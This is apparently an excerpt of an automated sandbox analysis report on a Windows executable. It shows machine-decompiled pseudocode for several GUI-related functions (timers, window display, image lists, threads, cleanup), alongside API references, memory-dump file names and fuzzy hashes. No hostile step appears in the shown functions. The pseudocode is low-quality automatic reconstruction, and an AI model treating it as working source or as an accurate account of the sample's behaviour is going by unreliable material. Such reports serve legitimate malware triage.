                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040BFA7
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040BFBC
                                                                                                                                • Part of subcall function 0040BAE0: SysAllocString.OLEAUT32(00432444), ref: 0040BB3C
                                                                                                                                • Part of subcall function 0040BAE0: __wcsicmp.LIBCMT ref: 0040BB4B
                                                                                                                                • Part of subcall function 0040BAE0: __wcsicmp.LIBCMT ref: 0040BB65
                                                                                                                                • Part of subcall function 0040BAE0: _memset.LIBCMT ref: 0040BBE6
                                                                                                                                • Part of subcall function 0040BAE0: SysAllocString.OLEAUT32(?), ref: 0040BC95
                                                                                                                                • Part of subcall function 0040BAE0: _mbstowcs.LIBCMT ref: 0040BDDA
                                                                                                                                • Part of subcall function 0040BAE0: SysAllocString.OLEAUT32(?), ref: 0040BDE9
                                                                                                                                • Part of subcall function 0040BAE0: SysFreeString.OLEAUT32(?), ref: 0040BE14
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Alloc$Free__wcsicmp$DecrementInterlocked_malloc_mbstowcs_memset
                                                                                                                              • String ID: adf$autodetected$excluded$useradded$xmldom load failed
                                                                                                                              • API String ID: 2094216331-1233182966
                                                                                                                              • Opcode ID: 9fdf690f962add5e484311a2c6ef9b84fff907d276b3adb90322aa8398981fcb
                                                                                                                              • Instruction ID: ad5892ac4662a05f78b64969db0480072afdbd86615999fb26334f1ff4e92037
                                                                                                                              • Opcode Fuzzy Hash: 9fdf690f962add5e484311a2c6ef9b84fff907d276b3adb90322aa8398981fcb
                                                                                                                              • Instruction Fuzzy Hash: 0F3191B17047059BC210DF65DD42A2BB6E5EB88B54F100A3FF446E32C1DB7DA9448B9E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00410ED0 Relevance: 12.2, APIs: 8, Instructions: 208timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 36%
                                                                                                                              			E00410ED0(void __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t41;
				signed int _t42;
				int _t45;
				void* _t47;
				intOrPtr* _t51;
				struct HWND__* _t52;
				intOrPtr* _t55;
				struct HWND__* _t56;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t64;
				intOrPtr* _t67;
				intOrPtr* _t69;
				void* _t74;
				void* _t76;
				intOrPtr* _t80;
				void* _t81;
				struct HWND__* _t85;
				void* _t86;
				int _t87;
				intOrPtr* _t89;
				void* _t90;
				intOrPtr* _t101;
				int _t106;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				void* _t112;
				void* _t114;
				void _t116;
				void* _t117;
				int _t118;
				struct HWND__* _t119;
				signed int _t120;
				void* _t122;
				intOrPtr _t124;

				_t103 = __edx;
				_t120 = _t122 - 0x204;
				_push(0xffffffff);
				_push(E00430A90);
				_push( *[fs:0x0]);
				_t124 = _t122 - 0x1f8;
				_t41 =  *0x43a6a8; // 0x2a5cd135
				_t42 = _t41 ^ _t120;
				 *(_t120 + 0x200) = _t42;
				_push(_t42);
				 *[fs:0x0] = _t120 - 0xc;
				 *((intOrPtr*)(_t120 - 0x10)) = _t124;
				_t116 = __ecx;
				_t45 = SetTimer( *(__ecx + 4), 1, 0x1f4, 0);
				if(_t45 != 0) {
					 *(_t116 + 0x28) = 1;
					 *((intOrPtr*)(_t116 + 0x20)) = 0;
					 *((intOrPtr*)(_t116 + 0x24)) = 0;
					E00405DD0( *((intOrPtr*)(_t116 + 8)));
					_t47 = E00403C60( *((intOrPtr*)(_t116 + 8)));
					_t89 =  *0x43baa4; // 0x418f9c
					 *_t89(_t47, 0);
					E0040F3C0(_t116, 0);
					_t106 =  *(_t116 + 4);
					_t51 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t51 == 0) {
						_t52 = 0;
					} else {
						_t52 =  *_t51(_t106, 0x74);
						_t124 = _t124 + 8;
					}
					ShowWindow(_t52, 5);
					 *(_t120 - 0x14) =  *(_t116 + 4);
					_t55 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t55 == 0) {
						_t56 = 0;
					} else {
						_t103 =  *(_t120 - 0x14);
						_t56 =  *_t55( *(_t120 - 0x14), 0x73);
						_t124 = _t124 + 8;
					}
					ShowWindow(_t56, 0);
					_t108 =  *(_t116 + 4);
					_t59 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t59 == 0) {
						_t60 = 0;
					} else {
						_t60 =  *_t59(_t108, 2);
						_t124 = _t124 + 8;
					}
					 *_t89(_t60, 0);
					_t109 =  *(_t116 + 4);
					_t63 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t63 == 0) {
						_t64 = 0;
					} else {
						_t64 =  *_t63(_t109, 0x402);
						_t124 = _t124 + 8;
					}
					 *_t89(_t64, 0);
					_t110 =  *(_t116 + 4);
					_t67 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t67 == 0) {
						 *(_t120 - 0x14) = 0;
					} else {
						_t87 =  *_t67(_t110, 0x4e27);
						_t124 = _t124 + 8;
						 *(_t120 - 0x14) = _t87;
					}
					_t111 =  *(_t116 + 4);
					_t69 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t69 == 0) {
						_t112 = 0;
					} else {
						_t86 =  *_t69(_t111, 0x4e28);
						_t124 = _t124 + 8;
						_t112 = _t86;
					}
					 *_t89( *(_t120 - 0x14), 0);
					 *_t89(_t112, 0);
					 *0x43bdec = 0;
					 *0x43bdf0 = 0;
					 *0x43bdf4 = 0;
					 *0x43bdec = _t116;
					 *0x43bdf0 = 0xffffffff;
					 *0x43bdf4 = 0;
					_t74 =  *(_t116 + 0x10);
					 *((intOrPtr*)(_t120 - 4)) = 0;
					if(_t74 != 0) {
						_t45 = CloseHandle(_t74);
					} else {
						_t76 = CreateThread(0, 0, E00410900, 0x43bdec, 4, _t120 - 0x18);
						 *(_t116 + 0x10) = _t76;
						SetThreadPriority(_t76, 0xffffffff);
						_t103 =  *(_t116 + 0x10);
						ResumeThread( *(_t116 + 0x10));
						_t118 =  *(_t116 + 4);
						_t80 =  *((intOrPtr*)(E00404510() + 0x70));
						if(_t80 == 0) {
							_t119 = 0;
						} else {
							_t85 =  *_t80(_t118, 0x6c);
							_t124 = _t124 + 8;
							_t119 = _t85;
						}
						_t81 = E00404510();
						_t101 =  *((intOrPtr*)(_t81 + 8));
						if(_t101 != 0) {
							_t103 = _t120;
							 *_t101( *((intOrPtr*)(_t81 + 0xbc)), 0x7c, _t120, 0x100);
						}
						 *0x43bac4(_t119, _t120);
						_t45 = ShowWindow(_t119, 1);
					}
				} else {
					 *(_t116 + 0x28) = _t45;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t120 - 0xc));
				_pop(_t114);
				_pop(_t117);
				_pop(_t90);
				return E0041B3F9(_t45, _t90,  *(_t120 + 0x200) ^ _t120, _t103, _t114, _t117);
			}













































                                                                                                                              0x00410ed0
                                                                                                                              0x00410ed1
                                                                                                                              0x00410ede
                                                                                                                              0x00410ee0
                                                                                                                              0x00410eeb
                                                                                                                              0x00410eec
                                                                                                                              0x00410eef
                                                                                                                              0x00410ef4
                                                                                                                              0x00410ef6
                                                                                                                              0x00410eff
                                                                                                                              0x00410f03
                                                                                                                              0x00410f09
                                                                                                                              0x00410f14
                                                                                                                              0x00410f1c
                                                                                                                              0x00410f24
                                                                                                                              0x00410f31
                                                                                                                              0x00410f35
                                                                                                                              0x00410f38
                                                                                                                              0x00410f3b
                                                                                                                              0x00410f44
                                                                                                                              0x00410f49
                                                                                                                              0x00410f50
                                                                                                                              0x00410f55
                                                                                                                              0x00410f5a
                                                                                                                              0x00410f62
                                                                                                                              0x00410f67
                                                                                                                              0x00410f73
                                                                                                                              0x00410f69
                                                                                                                              0x00410f6c
                                                                                                                              0x00410f6e
                                                                                                                              0x00410f6e
                                                                                                                              0x00410f7e
                                                                                                                              0x00410f83
                                                                                                                              0x00410f8b
                                                                                                                              0x00410f90
                                                                                                                              0x00410f9f
                                                                                                                              0x00410f92
                                                                                                                              0x00410f92
                                                                                                                              0x00410f98
                                                                                                                              0x00410f9a
                                                                                                                              0x00410f9a
                                                                                                                              0x00410fa4
                                                                                                                              0x00410fa6
                                                                                                                              0x00410fae
                                                                                                                              0x00410fb3
                                                                                                                              0x00410fbf
                                                                                                                              0x00410fb5
                                                                                                                              0x00410fb8
                                                                                                                              0x00410fba
                                                                                                                              0x00410fba
                                                                                                                              0x00410fc4
                                                                                                                              0x00410fc6
                                                                                                                              0x00410fce
                                                                                                                              0x00410fd3
                                                                                                                              0x00410fe2
                                                                                                                              0x00410fd5
                                                                                                                              0x00410fdb
                                                                                                                              0x00410fdd
                                                                                                                              0x00410fdd
                                                                                                                              0x00410fe7
                                                                                                                              0x00410fe9
                                                                                                                              0x00410ff1
                                                                                                                              0x00410ff6
                                                                                                                              0x00411008
                                                                                                                              0x00410ff8
                                                                                                                              0x00410ffe
                                                                                                                              0x00411000
                                                                                                                              0x00411003
                                                                                                                              0x00411003
                                                                                                                              0x0041100f
                                                                                                                              0x00411017
                                                                                                                              0x0041101c
                                                                                                                              0x0041102d
                                                                                                                              0x0041101e
                                                                                                                              0x00411024
                                                                                                                              0x00411026
                                                                                                                              0x00411029
                                                                                                                              0x00411029
                                                                                                                              0x00411035
                                                                                                                              0x0041103a
                                                                                                                              0x00411040
                                                                                                                              0x00411045
                                                                                                                              0x0041104a
                                                                                                                              0x0041104f
                                                                                                                              0x00411055
                                                                                                                              0x0041105f
                                                                                                                              0x00411065
                                                                                                                              0x0041106a
                                                                                                                              0x0041106d
                                                                                                                              0x00411100
                                                                                                                              0x00411073
                                                                                                                              0x00411085
                                                                                                                              0x0041108e
                                                                                                                              0x00411091
                                                                                                                              0x00411097
                                                                                                                              0x0041109b
                                                                                                                              0x004110a1
                                                                                                                              0x004110a9
                                                                                                                              0x004110ae
                                                                                                                              0x004110bc
                                                                                                                              0x004110b0
                                                                                                                              0x004110b3
                                                                                                                              0x004110b5
                                                                                                                              0x004110b8
                                                                                                                              0x004110b8
                                                                                                                              0x004110be
                                                                                                                              0x004110c3
                                                                                                                              0x004110c8
                                                                                                                              0x004110d5
                                                                                                                              0x004110dc
                                                                                                                              0x004110de
                                                                                                                              0x004110e6
                                                                                                                              0x004110ef
                                                                                                                              0x004110ef
                                                                                                                              0x00410f26
                                                                                                                              0x00410f26
                                                                                                                              0x00410f26
                                                                                                                              0x00411109
                                                                                                                              0x00411111
                                                                                                                              0x00411112
                                                                                                                              0x00411113
                                                                                                                              0x0041112a

                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000001F4,00000000), ref: 00410F1C
                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,00430A90,000000FF), ref: 00410F7E
                                                                                                                              • ShowWindow.USER32(00000000,00000000,?,?,?,?,00430A90,000000FF), ref: 00410FA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ShowWindow$Timer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3783400800-0
                                                                                                                              • Opcode ID: 9179981613c336386aae32eb4bbf95089b8b3907ae578b96d48010989d6a268f
                                                                                                                              • Instruction ID: f936124cdc2904c81052acce9024a6d9c7fe74188f184e75cbccf04400b6081f
                                                                                                                              • Opcode Fuzzy Hash: 9179981613c336386aae32eb4bbf95089b8b3907ae578b96d48010989d6a268f
                                                                                                                              • Instruction Fuzzy Hash: 1261B371A00200ABD720EF75DC46F6B77A8EB84B10F14452EF615E76A0D7B8E9818B59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00410D30 Relevance: 12.2, APIs: 8, Instructions: 152timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 42%
                                                                                                                              			E00410D30(void __ecx) {
				long _v36;
				int _v40;
				int _t24;
				void* _t25;
				intOrPtr* _t28;
				struct HWND__* _t29;
				intOrPtr* _t32;
				struct HWND__* _t33;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t46;
				int _t50;
				struct _SECURITY_ATTRIBUTES* _t51;
				void* _t53;
				void* _t58;
				void* _t59;
				intOrPtr _t60;
				void* _t61;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t74;
				void _t76;
				void* _t77;
				intOrPtr* _t78;
				void* _t80;

				_t76 = __ecx;
				_t24 = SetTimer( *(__ecx + 4), 1, 0x1f4, 0);
				if(_t24 != 0) {
					 *(_t76 + 0x28) = 1;
					_t25 = E00403C60( *((intOrPtr*)(_t76 + 8)));
					_t78 =  *0x43baa4; // 0x418f9c
					 *_t78(_t25, 0, _t67, _t77, _t59);
					_t68 =  *((intOrPtr*)(_t76 + 4));
					_t28 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t28 == 0) {
						_t29 = 0;
					} else {
						_t29 =  *_t28(_t68, 0x74);
						_t80 = _t80 + 8;
					}
					ShowWindow(_t29, 5);
					_t60 =  *((intOrPtr*)(_t76 + 4));
					_t32 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t32 == 0) {
						_t33 = 0;
					} else {
						_t33 =  *_t32(_t60, 0x73);
						_t80 = _t80 + 8;
					}
					ShowWindow(_t33, 0);
					_t70 =  *((intOrPtr*)(_t76 + 4));
					_t36 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t36 == 0) {
						_t37 = 0;
					} else {
						_t37 =  *_t36(_t70, 2);
						_t80 = _t80 + 8;
					}
					 *_t78(_t37, 0);
					_t71 =  *((intOrPtr*)(_t76 + 4));
					_t40 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t40 == 0) {
						_t41 = 0;
					} else {
						_t41 =  *_t40(_t71, 0x402);
						_t80 = _t80 + 8;
					}
					 *_t78(_t41, 0);
					_t72 =  *((intOrPtr*)(_t76 + 4));
					_t44 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t44 == 0) {
						_t61 = 0;
					} else {
						_t58 =  *_t44(_t72, 0x4e27);
						_t80 = _t80 + 8;
						_t61 = _t58;
					}
					_t73 =  *((intOrPtr*)(_t76 + 4));
					_t46 =  *((intOrPtr*)(E00404510() + 0x70));
					if(_t46 == 0) {
						_t74 = 0;
					} else {
						_t74 =  *_t46(_t73, 0x4e28);
					}
					 *_t78(_t61, 0);
					 *_t78(_t74, 0);
					 *0x43bdec = 0;
					 *0x43bdf0 = 0;
					 *0x43bdf4 = 0;
					_t50 = _v40;
					 *0x43bdec = _t76;
					 *0x43bdf0 = _v36;
					if(_t50 == 0) {
						 *0x43bdf4 = 0;
					} else {
						__imp__#2(_t50);
						 *0x43bdf4 = _t50;
					}
					_t51 =  *(_t76 + 0x10);
					if(_t51 != 0) {
						return CloseHandle(_t51);
					} else {
						_t53 = CreateThread(_t51, _t51, E00410900, 0x43bdec, 4,  &_v36);
						 *(_t76 + 0x10) = _t53;
						SetThreadPriority(_t53, 0xffffffff);
						return ResumeThread( *(_t76 + 0x10));
					}
				} else {
					 *(_t76 + 0x28) = _t24;
					return _t24;
				}
			}



































                                                                                                                              0x00410d38
                                                                                                                              0x00410d40
                                                                                                                              0x00410d48
                                                                                                                              0x00410d59
                                                                                                                              0x00410d5d
                                                                                                                              0x00410d62
                                                                                                                              0x00410d69
                                                                                                                              0x00410d6b
                                                                                                                              0x00410d73
                                                                                                                              0x00410d78
                                                                                                                              0x00410d84
                                                                                                                              0x00410d7a
                                                                                                                              0x00410d7d
                                                                                                                              0x00410d7f
                                                                                                                              0x00410d7f
                                                                                                                              0x00410d8f
                                                                                                                              0x00410d91
                                                                                                                              0x00410d99
                                                                                                                              0x00410d9e
                                                                                                                              0x00410daa
                                                                                                                              0x00410da0
                                                                                                                              0x00410da3
                                                                                                                              0x00410da5
                                                                                                                              0x00410da5
                                                                                                                              0x00410daf
                                                                                                                              0x00410db1
                                                                                                                              0x00410db9
                                                                                                                              0x00410dbe
                                                                                                                              0x00410dca
                                                                                                                              0x00410dc0
                                                                                                                              0x00410dc3
                                                                                                                              0x00410dc5
                                                                                                                              0x00410dc5
                                                                                                                              0x00410dcf
                                                                                                                              0x00410dd1
                                                                                                                              0x00410dd9
                                                                                                                              0x00410dde
                                                                                                                              0x00410ded
                                                                                                                              0x00410de0
                                                                                                                              0x00410de6
                                                                                                                              0x00410de8
                                                                                                                              0x00410de8
                                                                                                                              0x00410df2
                                                                                                                              0x00410df4
                                                                                                                              0x00410dfc
                                                                                                                              0x00410e01
                                                                                                                              0x00410e12
                                                                                                                              0x00410e03
                                                                                                                              0x00410e09
                                                                                                                              0x00410e0b
                                                                                                                              0x00410e0e
                                                                                                                              0x00410e0e
                                                                                                                              0x00410e14
                                                                                                                              0x00410e1c
                                                                                                                              0x00410e21
                                                                                                                              0x00410e32
                                                                                                                              0x00410e23
                                                                                                                              0x00410e2e
                                                                                                                              0x00410e2e
                                                                                                                              0x00410e37
                                                                                                                              0x00410e3c
                                                                                                                              0x00410e44
                                                                                                                              0x00410e49
                                                                                                                              0x00410e4f
                                                                                                                              0x00410e54
                                                                                                                              0x00410e5b
                                                                                                                              0x00410e61
                                                                                                                              0x00410e68
                                                                                                                              0x00410e78
                                                                                                                              0x00410e6a
                                                                                                                              0x00410e6b
                                                                                                                              0x00410e71
                                                                                                                              0x00410e71
                                                                                                                              0x00410e82
                                                                                                                              0x00410e87
                                                                                                                              0x00410ec4
                                                                                                                              0x00410e89
                                                                                                                              0x00410e9c
                                                                                                                              0x00410ea5
                                                                                                                              0x00410ea8
                                                                                                                              0x00410eb9
                                                                                                                              0x00410eb9
                                                                                                                              0x00410d4a
                                                                                                                              0x00410d4a
                                                                                                                              0x00410d4e
                                                                                                                              0x00410d4e

                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000001F4,00000000), ref: 00410D40
                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00000000), ref: 00410D8F
                                                                                                                              • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,00000000), ref: 00410DAF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ShowWindow$Timer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3783400800-0
                                                                                                                              • Opcode ID: df183b91e77de2b61a5b52fce8e0a132d45d7993d2785666d350381b2b3ec5e9
                                                                                                                              • Instruction ID: 23eef72844f7f06778452f4a239c31742e92c3b38b5e8841caf01d597aa0a8a6
                                                                                                                              • Opcode Fuzzy Hash: df183b91e77de2b61a5b52fce8e0a132d45d7993d2785666d350381b2b3ec5e9
                                                                                                                              • Instruction Fuzzy Hash: AE419671644301ABD320ABB6ED45F5777E8FB84B10F04482AF255D72A1DBF8E881876D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040F670 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E0040F670() {
				void* _t7;
				void* _t10;
				void* _t12;
				void* _t15;
				void* _t18;
				void* _t21;
				void* _t24;
				intOrPtr* _t27;
				intOrPtr* _t28;
				void* _t37;

				_t37 = ImageList_Create(0x10, 0x10, 0x20, 0xa, 1);
				if(_t37 == 0) {
					L4:
					return 0;
				} else {
					_t7 = E00404510();
					_t27 =  *((intOrPtr*)(_t7 + 0x20));
					if(_t27 == 0) {
						L3:
						ImageList_Destroy(_t37);
						goto L4;
					} else {
						_t10 =  *_t27( *((intOrPtr*)(_t7 + 0xbc)), 0, 0x7a);
						if(_t10 != 0) {
							ImageList_Add(_t37, _t10, 0);
							_t12 = E00404510();
							_t28 =  *((intOrPtr*)(_t12 + 0x20));
							if(_t28 == 0) {
								L10:
								ImageList_Destroy(_t37);
								return 0;
							} else {
								_t15 =  *_t28( *((intOrPtr*)(_t12 + 0xbc)), 0, 0x7b);
								if(_t15 == 0) {
									goto L10;
								} else {
									ImageList_Add(_t37, _t15, 0);
									_t18 = E00403C30(E00404510(), 0, 0x7c);
									if(_t18 == 0) {
										goto L10;
									} else {
										ImageList_Add(_t37, _t18, 0);
										_t21 = E00403C30(E00404510(), 0, 0x86);
										if(_t21 == 0) {
											goto L10;
										} else {
											ImageList_Add(_t37, _t21, 0);
											_t24 = E00403C30(E00404510(), 0, 0x7d);
											if(_t24 != 0) {
												ImageList_Add(_t37, _t24, 0);
												return _t37;
											} else {
												goto L10;
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
			}













                                                                                                                              0x0040f681
                                                                                                                              0x0040f685
                                                                                                                              0x0040f6ae
                                                                                                                              0x0040f6b1
                                                                                                                              0x0040f687
                                                                                                                              0x0040f687
                                                                                                                              0x0040f68c
                                                                                                                              0x0040f691
                                                                                                                              0x0040f6a7
                                                                                                                              0x0040f6a8
                                                                                                                              0x00000000
                                                                                                                              0x0040f693
                                                                                                                              0x0040f69e
                                                                                                                              0x0040f6a5
                                                                                                                              0x0040f6bd
                                                                                                                              0x0040f6bf
                                                                                                                              0x0040f6c4
                                                                                                                              0x0040f6c9
                                                                                                                              0x0040f730
                                                                                                                              0x0040f731
                                                                                                                              0x0040f73b
                                                                                                                              0x0040f6cb
                                                                                                                              0x0040f6d6
                                                                                                                              0x0040f6dd
                                                                                                                              0x00000000
                                                                                                                              0x0040f6df
                                                                                                                              0x0040f6e3
                                                                                                                              0x0040f6f0
                                                                                                                              0x0040f6f7
                                                                                                                              0x00000000
                                                                                                                              0x0040f6f9
                                                                                                                              0x0040f6fd
                                                                                                                              0x0040f70d
                                                                                                                              0x0040f714
                                                                                                                              0x00000000
                                                                                                                              0x0040f716
                                                                                                                              0x0040f71a
                                                                                                                              0x0040f727
                                                                                                                              0x0040f72e
                                                                                                                              0x0040f740
                                                                                                                              0x0040f746
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040f72e
                                                                                                                              0x0040f714
                                                                                                                              0x0040f6f7
                                                                                                                              0x0040f6dd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040f6a5
                                                                                                                              0x0040f691

                                                                                                                              APIs
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000020,0000000A,00000001), ref: 0040F67B
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0040F6A8
                                                                                                                              • ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0040F6BD
                                                                                                                              • ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0040F6E3
                                                                                                                              • ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0040F6FD
                                                                                                                              • ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0040F71A
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0040F731
                                                                                                                              • ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0040F740
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ImageList_$Destroy$Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3650400131-0
                                                                                                                              • Opcode ID: 59ccb42b7b75f892b7d42c2d89cc9c63113dd95889320153eb272463d3ac00b2
                                                                                                                              • Instruction ID: 233c26fb349a12f85de3a6e9b839716ffa694476c79ebdec18b0b2d41a38e6b5
                                                                                                                              • Opcode Fuzzy Hash: 59ccb42b7b75f892b7d42c2d89cc9c63113dd95889320153eb272463d3ac00b2
                                                                                                                              • Instruction Fuzzy Hash: 62214D7174532036F63426726C46FAB25599F80B09F01443ABB05FF5D1EAACE84685AE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040FDA0 Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 88%
                                                                                                                              			E0040FDA0(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t22;
				int _t32;
				void* _t45;
				intOrPtr* _t46;
				void* _t47;

				_t46 = __ecx;
				_t22 =  *(__ecx + 0x10);
				 *__ecx = 0x4333b4;
				if(_t22 != 0) {
					CloseHandle(_t22);
					 *((intOrPtr*)(_t46 + 0x10)) = 0;
				}
				 *((intOrPtr*)(_t46 + 4)) = 0;
				 *((intOrPtr*)(_t46 + 8)) = 0;
				DeleteObject( *(_t46 + 0x4c));
				DeleteObject( *(_t46 + 0x50));
				DeleteObject( *(_t46 + 0x54));
				DeleteObject( *(_t46 + 0x58));
				DeleteObject( *(_t46 + 0x5c));
				DeleteObject( *(_t46 + 0x60));
				_t32 = DeleteObject( *(_t46 + 0x64));
				_t50 =  *((intOrPtr*)(_t46 + 0x880)) - 8;
				if( *((intOrPtr*)(_t46 + 0x880)) >= 8) {
					_push( *((intOrPtr*)(_t46 + 0x86c)));
					_t32 = L0041A97D(0, 8, _t46, _t50);
					_t47 = _t47 + 4;
				}
				 *((intOrPtr*)(_t46 + 0x880)) = 7;
				 *((intOrPtr*)(_t46 + 0x87c)) = 0;
				 *((short*)(_t46 + 0x86c)) = 0;
				_t51 =  *((intOrPtr*)(_t46 + 0x48)) - 8;
				_pop(_t45);
				if( *((intOrPtr*)(_t46 + 0x48)) >= 8) {
					_push( *((intOrPtr*)(_t46 + 0x34)));
					_t32 = L0041A97D(0, _t45, _t46, _t51);
				}
				 *((intOrPtr*)(_t46 + 0x44)) = 0;
				 *((intOrPtr*)(_t46 + 0x48)) = 7;
				 *((short*)(_t46 + 0x34)) = 0;
				return _t32;
			}











                                                                                                                              0x0040fda2
                                                                                                                              0x0040fda4
                                                                                                                              0x0040fdab
                                                                                                                              0x0040fdb1
                                                                                                                              0x0040fdb4
                                                                                                                              0x0040fdba
                                                                                                                              0x0040fdba
                                                                                                                              0x0040fdc8
                                                                                                                              0x0040fdcb
                                                                                                                              0x0040fdce
                                                                                                                              0x0040fdd4
                                                                                                                              0x0040fdda
                                                                                                                              0x0040fde0
                                                                                                                              0x0040fde6
                                                                                                                              0x0040fdec
                                                                                                                              0x0040fdf2
                                                                                                                              0x0040fdf9
                                                                                                                              0x0040fdff
                                                                                                                              0x0040fe07
                                                                                                                              0x0040fe08
                                                                                                                              0x0040fe0d
                                                                                                                              0x0040fe0d
                                                                                                                              0x0040fe10
                                                                                                                              0x0040fe1a
                                                                                                                              0x0040fe20
                                                                                                                              0x0040fe27
                                                                                                                              0x0040fe2a
                                                                                                                              0x0040fe2b
                                                                                                                              0x0040fe30
                                                                                                                              0x0040fe31
                                                                                                                              0x0040fe36
